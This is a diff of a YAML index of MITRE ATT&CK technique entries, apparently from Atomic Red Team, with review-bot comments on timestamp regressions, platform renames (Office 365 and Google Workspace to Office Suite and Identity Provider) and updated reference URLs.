kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -70422,7 +71356,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -70472,13 +71406,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -70546,11 +71479,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
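Review bot: the `modified` timestamp for T1529 regresses from '2023-05-09T14:00:00.188Z' to '2023-03-22T20:45:22.531Z' with no other change to the object in this hunk; same concern as for T1486 above, please verify which bundle the new value comes from.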
@@ -70615,7 +71547,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests:
- name: Restart System via `shutdown` - FreeBSD/macOS/Linux
@@ -70751,7 +71682,7 @@ impact:
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
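Review bot: the T1133 `modified` timestamp also moves backwards here, from '2023-05-09T14:00:00.188Z' to '2023-03-30T21:01:36.318Z'; if the earlier value was a placeholder rather than an upstream timestamp, say so in the PR description so the regression is not mistaken for data loss.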
@@ -70829,7 +71760,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -70879,11 +71809,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -70922,10 +71851,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
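Review bot: T1566.002 replaces the Office 365 and Google Workspace platforms with Identity Provider and Office Suite; anything filtering this index by the old platform names will stop matching this technique, so derived per-platform indexes should be regenerated in the same PR. The `x_mitre_version` bump to '2.7' is consistent with a platform-only change.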
@@ -70942,7 +71871,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
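Review bot: the ACSC reference URL is switched to a web.archive.org snapshot (20210708) while the description still reads 'Retrieved October 19, 2020'; consider updating the retrieval date alongside the URL, as was done for the FS-ISAC reference earlier in this PR. The same reference is updated again under T1566.001 below, so both copies should carry matching text.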
@@ -70981,12 +71910,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -71048,7 +71976,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -71065,7 +71993,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -71095,7 +72022,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
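Review bot: T1195.003 is the third object in this PR whose `modified` timestamp goes backwards, here from '2022-05-24T14:00:00.188Z' to '2022-04-28T16:05:10.755Z'; if these regressions are expected because the old values were generated locally, a single note in the PR description covering all of them would settle the question.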
@@ -71109,7 +72036,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -71172,12 +72098,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -71252,7 +72177,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -71266,19 +72191,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
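Review bot: `spec_version: '2.1'` is dropped from the T1195 object here, and the same removal recurs for essentially every technique object in this diff; since that is a STIX-level field rather than an ATT&CK extension, the PR description should state that the generator now strips it and that nothing downstream reads it per object. The T1190 text changes themselves (the "Internet-accessible" hyphenation and the added Cloud Instance Metadata API reference) are upstream wording and look fine.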
@@ -71304,7 +72228,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -71359,7 +72283,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -71422,11 +72345,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -71441,6 +72363,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -71449,18 +72372,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
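Review bot: the platform list for T1078.001 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` alongside the 1.3 to 1.4 version bump. Any per-platform index derived from this file (anything that filters on the old platform names) has to be regenerated in the same change, otherwise those indexes will silently keep entries for platform names that no longer exist in the technique objects.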
@@ -71492,14 +72415,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
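Review bot: the deletion of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at the tail of T1078.001 is a move, not a removal: the two preceding hunks re-add both keys earlier in the object, so only `spec_version` actually goes away. Because this key reordering repeats for many objects and makes the real changes hard to spot, the PR description should say that keys are now emitted in a different (alphabetical) order.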
@@ -71510,6 +72430,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -71518,22 +72443,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -71558,36 +72479,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
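Review bot: the T1566 description adds a new citation key, `(Citation: phishing-krebs)`, for the thread-hijacking sentence; it only resolves because a later hunk in this file adds the matching `source_name: phishing-krebs` entry under external_references, so the two hunks must land together. The switch from a folded double-quoted scalar (with `\n\n` escapes and a stray trailing space before `\n\nVictims`) to a `|-` block literal is an improvement in readability and does not change the rendered text.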
@@ -71616,9 +72520,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -71636,7 +72540,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
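Review bot: pointing the ACSC reference at a web.archive.org snapshot (20210708014107) is the right fix for a source URL that no longer serves the document; the `Retrieved October 19, 2020` date is correctly left alone, since it records when the content was read rather than when the snapshot was captured. The two-line single-quoted `description` for `phishing-krebs` is valid YAML (the colon in the title is inside the quotes).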
@@ -71674,11 +72582,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -71695,7 +72602,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -71705,7 +72611,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -71714,19 +72620,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -71774,11 +72678,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -71798,10 +72703,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
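Review bot: T1566.004 loses `SaaS` together with `Office 365` and `Google Workspace` and gains only `Identity Provider`, whereas the other objects in this diff keep `SaaS` next to the new `Office Suite` / `Identity Provider` entries. Please confirm this matches the upstream object at version 1.1 rather than a platform mapping that over-removed; T1189 further down shows the same `SaaS` drop and should be checked the same way.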
@@ -71834,7 +72737,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -71873,7 +72775,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
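Review bot: the `modified` timestamp for T1195.002 moves backwards (2022-05-24 to 2022-04-28), and the same regression appears for T1200, T1029, T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030 and T1052 later in this file. The old values all share a repeated time-of-day (`T14:00:00.188Z` or `T14:49:39.188Z`), which looks like a release-wide stamp being replaced by per-object modification times; state that in the PR description so it is not read as pulling an older bundle.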
@@ -71888,7 +72790,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -71968,11 +72869,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -72028,11 +72928,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -72093,8 +72992,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -72122,13 +73021,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -72168,8 +73066,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -72177,13 +73077,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
